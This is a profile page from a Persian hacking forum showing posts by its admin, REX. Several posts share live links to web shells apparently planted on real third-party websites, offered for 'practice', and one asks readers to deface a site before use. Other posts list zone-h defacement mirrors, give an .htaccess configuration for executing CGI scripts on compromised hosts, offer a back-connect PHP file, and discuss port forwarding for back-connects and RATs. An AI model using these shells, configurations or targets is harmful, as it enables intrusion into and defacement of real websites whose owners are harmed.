REX

مدیر سایت
  • تعداد ارسال ها

    468
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    39

آخرین بار برد REX در مهر 18

REX یکی از رکورد داران بیشترین تعداد پسند مطالب است!

درباره REX

  • درجه
    Guardiran Security Team

Contact Methods

  • AIM
    -
  • MSN
    -
  • Website URL
    http://-
  • ICQ
    -
  • Yahoo
    -
  • Jabber
    -
  • Skype
    -

Profile Information

  • جنسیت
    آقا
  • محل سکونت
    Error

آخرین بازدید کنندگان نمایه

3,064 بازدید کننده نمایه
  1. اگه به تاریخ تاپیک دقت کنید میبینید که این تاپیک در سال 94 باز شده و طبیعی هستش که این روش قدیمی شده باشه/ لطفا تاپیک های قدیمی رو بالا نیارید. با تشکر/
  2. REX

    راجع به این موضوع تاپیک های بسیار زیادی در انجمن موجود هستش ولی باز هم توضویح میدم: این موضوع رو به صورت کلی عرض میکنم که شامل تمام موارد خاص هم میشه: 1 - port forwarding رو ابتدا روی تنظیمات مودم انجام میدید port مورد نظر رو روی ipv4 ست میکنید 2- فایروال رو کلا خاموش میکنید یا در غیر اینصورت اکسس به پورت مورد نظر رو به صورت اختصاصی از تنظیمات فایروال مقدور میسازید 3- بعد از انجام این تنظیمات پورت مورد نظر باز شده اما تا زمانی که از پورت استفاده ای نکنید سایت هایی همچون yougeysignal و غیره نمیتوانند تشخیص دهند که port x روی ip شما باز شده یا خیر... شما باید اول از port استفاده کنید بعد چک کنید که باز شده یا خیر. نکته : شما باید ip اختصاصی داشته باشید تا بتونید port forwarding انجام بدهید. تذکر : در صورت دارا بودن ip اختصاصی یا استاتیک شما باید سعی کنید ip رو در اختیار دیگران قرار ندهید و تلاش کنید تا کسی اون رو بدست نیاره که متاسفانه شما اون رو در معرض دید همه گذاشتید. موفق باشید.
  3. http://zone-h.com/mirror/id/31476232 http://zone-h.com/mirror/id/31477373 http://zone-h.com/mirror/id/31513199 http://zone-h.com/mirror/id/31513237 http://zone-h.com/mirror/id/31513389 http://zone-h.com/mirror/id/31518150 http://zone-h.com/mirror/id/31519897 http://zone-h.com/mirror/id/31519896
  4. REX

    Free Online PHP Obfuscator http://www.pipsomania.com/best_php_obfuscator.do https://fopo.com.ar/
  5. REX

    128 سایت روی این سرور هست میشه گفت یه تارگت خوب برای تمرینه بجز این سایت که شل ازش قرار دادم ,هیچ سایتی دیفیس نشده , سیملینک هم میخوره تست کردم جهت تمرین شما عزیزان قرار دادم https://www.bristolzerotolerance.com/wp-content/themes/twentyfifteen/404.php موفق باشید.
  6. REX

    وقتی هیچ راهی نداشتید برای بک کانکت گرفتن یا استفاده از cgi از این فایل php استفاده کنید معجره میکنه واقعا بدرد بخوره... rexcmd.php
  7. REX

    دیفیس نشده لطفا قبل از استفاده دیفیس کنید تشکر https://visiongulf.com/hosting/e-card/3/index.php
  8. http://zone-h.com/mirror/id/31472395 http://zone-h.com/mirror/id/31472396 http://zone-h.com/mirror/id/31472397 http://zone-h.com/mirror/id/31472398 http://zone-h.com/mirror/id/31472399 http://zone-h.com/mirror/id/31472400 http://zone-h.com/mirror/id/31472401 http://zone-h.com/mirror/id/31472402 http://zone-h.com/mirror/id/31472403 http://zone-h.com/mirror/id/31472404 لطفا از deface page جدید استفاده کنید با تشکر/ لینک : کلیک کنید
  9. REX

    چند سال پیش یه آموزش تصوری در این مورد ریکورد کرده بودم یادش بخیر... امیدوارم مشکلتون حل کنه این نکاتم داشته باشید : ساخت فایل htaccess Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .rex AddHandler cgi-script .rex تغییر permission فایل cgi به 0755 و اضافه کردن این تیکه کد به فایل cgi : -I/usr/local/bandmin bypas cgi.rar
  10. REX

    فراتر از جستجو

    به طور کلی هنگامی که ما میخواهیم یک متن خاص را جستجو کنیم، مرورگر مورد علاقه خود را باز می کنیم، به موتور جستجوی وب می رویم و برخی از کلمات مربوط به آن را تایپ می کنیم. بسته به اینکه چگونه جستجو را انجام می دهیم، نتایج بیشتری را به دست می آوریم با جستجوگرها کارهای خیلی مفیدی میتوان انجام داد و خیلی زیاد مطلب اموزشی میتوان قرار داد. در این متن نسبتا کوتاه قست دارم از کاربرد جستوگرها برای نفوذگرها و نحوه ی استفاده آنها برای گرفتن اطلاعات مورد نیاز مطالبی رو خدمت شما کاربران گاردایران ارایه دهم , وقتی که صحبت از جستجوگر و نفوذ کنار هم میان ذهن اکثر شما عزیزان به سمت Google Hacking و استفاده از Dork ها جهت شناسایی اسیب پذیریها میرود, اما همه جیز در اینجا خلاصه نمیشود. بعد از توضیحاتی کوتاه راجع به جستجوگرها چند جستجوگر که بسیار زیاد برای نفوذگرها قابل اهمیت و پرکاربرد هستند را معرفی خواهم کرد .جستجوگرها بر این اساس دسته بندی میشوند : Crawler based search engines Human powered directories Hybrid search engines Other special search engines Crawler based search engines همه موتورهای جستجوی مبتنی بر خزنده از یک خزنده عنکبوت برای خزیدن و نمایه سازی محتوای جدید به پایگاه داده جستجو استفاده می کنند, هر موتور جستجوگر مبتنی بر خزنده 4 مرحله را برای جستجو دنبال میکنند. Crawling Indexing Calculating Relevancy Retrieving the Result واژه Crawling رو شما در تمام ابزارهای تست نفوذ و اسکنر های وب مشاهده کردید , spider تمام محتوای تک تک پیج ها و لینک های درون صفحات را شناسایی میکند و فهرست میکند سپس کاربران از میان این اطلاعات ذخیره شده، آنچه را که می‌خواهند جستجو می‌کنند. اگر شما در صفحه وب خود تغییراتی را اعمال نمایید، موتورهای جستجوی پیمایشی آنها را به طور خودکار می‌یابند و سپس این تغییرات در فهرست ها اعمال میکنند. Human powered directories این نوع وابسته به کاربرانی است که آن را تکمیل می‌کنند, کاربر صفحه مورد نظر را به همراه توضیحی کوتاه در فهرست ثبت می‌کند یا این کار توسط ویراستارهایی که برای آن فهرست در نظر گرفته شده، انجام می‌شود. عمل جستجو در این حالت تنها بر روی توضیحات ثبت شده صورت می‌گیرد و در صورت تغییر روی صفحه وب، روی فهرست تغییری به وجود نخواهد آورد. Hybrid search engines موتورهای جستجو ترکیبی از هر دو فهرست خزنده و دستی برای فهرست سایت ها در نتایج جستجو استفاده می کنند. بیشتر موتورهای جستجوگر مبتنی بر خزنده مانند گوگل اساسا از خزنده ها به عنوان مکانیسم اولیه و Human powered به عنوان مکانیسم ثانویه استفاده می کنند, موتورهای جستجو بیشتر این روزها به یک مدل مبتنی بر ترکیبی حرکت می کنند. خیلی کوتاه توضیح دادم توضیحات جامع تری در این باره در فضای مجازی مطالعه کنید. 5 جستجوگر مطرح مخصوص هکرها : #1 SHODAN #2 censys #3 ZOOMEYE #4 IVRE #5 PUNKSPIDER به زودی آموزش های تصویری استفاده از این جستجوگرها در انجمن قرار خواهد گرفت با ما همراه باشید. امیدوارم این مقاله مفید واقع شده باشد. موفق و سربلند باشید . تیم امنیتی گارد ایران.
  11. REX

    درود آموزش مستقیم روش های نفوذ طبق قوانین انجمن که بر پایه و اساس بند "ه" فهرست مصاديق محتوای مجرمانه می باشد ممنوع است. قبل از ایجاد تاپیک در انجمن جستجو کنید, قبل تر در رابطه با این موضوع سوالات زیادی شده..
  12. REX

    درود دوست عزیز وقتی IP STATIC تهییه کردید باید تمام سعیتونو کنید تا کسی اونو پیدا نکنه و بدست نیاره که شما اونو در معرض دید همه گذاشتید چند نکته دیگه شما وقتی PORT FORWARDING انجام میدید از PANEL عملا PORT باز شده (با وجود بستن فایروال ویندوز) اما تا زمانی که از اون استفاده نکنید نمیتونیید در چنین سایت هایی فعال بودن یا غیر فعال بودن اون رو ببینید. ضمنا زمانی که درخواست IP STATIC رو میدید از شما تعهد گرفته میشه از طرف ISP و شناسایی شما در سطح اینترنت ساده تر میشه مخصوصا زمانی که برای ارتکاب جرم از اون استفاده میکنید مثل بک کانکت گرفتن و استفاده از RAT ها و ... به همین دلیل هستش کسایی که IP اختصاصی دارند باز هم از VPS یا سایت هایی که خدماتی مشابه خدمات NO IP میدن استفاده میکنند اسکرین شات هایی که در اون IP شما موجود هست رو حذف میکنم. موفق باشید.
  13. http://www.zone-h.org/mirror/id/30737085 http://www.zone-h.org/mirror/id/30737086 http://www.zone-h.org/mirror/id/30737090 http://www.zone-h.org/mirror/id/30737091 http://www.zone-h.org/mirror/id/30737092 http://www.zone-h.org/mirror/id/30737093 http://www.zone-h.org/mirror/id/30737097 http://www.zone-h.org/mirror/id/30737104 http://www.zone-h.org/mirror/id/30737107
  14. http://www.zone-h.org/mirror/id/30664711 http://www.zone-h.org/mirror/id/30664710 http://www.zone-h.org/mirror/id/30664709 http://www.zone-h.org/mirror/id/30664708 http://www.zone-h.org/mirror/id/30664706 http://www.zone-h.org/mirror/id/30664705